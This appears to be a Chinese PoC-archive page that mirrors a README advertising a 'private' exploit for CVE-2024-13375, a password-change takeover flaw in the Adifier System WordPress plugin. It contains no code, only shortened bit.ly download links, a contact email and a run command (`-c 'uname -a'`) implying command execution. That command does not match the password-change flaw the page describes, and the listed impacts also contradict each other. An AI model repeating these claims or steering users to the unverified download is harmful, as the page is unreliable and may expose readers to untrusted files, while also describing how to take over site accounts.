目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2024-13375 PoC — WordPress plugin Adifier System 安全漏洞

来源
关联漏洞
标题: WordPress plugin Adifier System 安全漏洞 (CVE-2024-13375)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Adifier System 3.1.7及之前版本存在安全漏洞,该漏洞源于更新用户详细信息之前没有正确验证用户身份,存在权限提升漏洞,未经身份验证的攻击者可以更改任意用户的密码。
Description
CVE-2024-13375 Unverified Password Change
介绍
# CVE-2024-13375 - Unverified Password Change (CWE-620)

## Overview
The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This vulnerability is due to the plugin not properly validating a user's identity prior to updating their details, including passwords, through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their accounts.

## Exploit:
## [Download here](https://bit.ly/3WjgS7J)
## Details
+ **CVE ID**: [CVE-2024-13375](https://nvd.nist.gov/vuln/detail/CVE-2024-13375)
+ **Published**: 01/18/2025
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows unauthenticated attackers to change the passwords of any user account, including administrator accounts. Once an attacker changes a user's password, they can then log in as that user and have full access to their account privileges. For administrator accounts, this means complete control over the WordPress site, potentially leading to: 1. Unauthorized access to sensitive information 2. Modification or deletion of website content 3. Installation of malicious plugins or themes 4. Potential compromise of the entire web server The CVSS v3.1 base score for this vulnerability is 9.8 (Critical), with high impacts on confidentiality, integrity, and availability. The attack vector is network-based, requires no user interaction, and can be executed with low attack complexity.

## Affected Versions
Adifier System <= 3.1.7
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **Exploit** :[Download here](https://bit.ly/3WjgS7J)
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →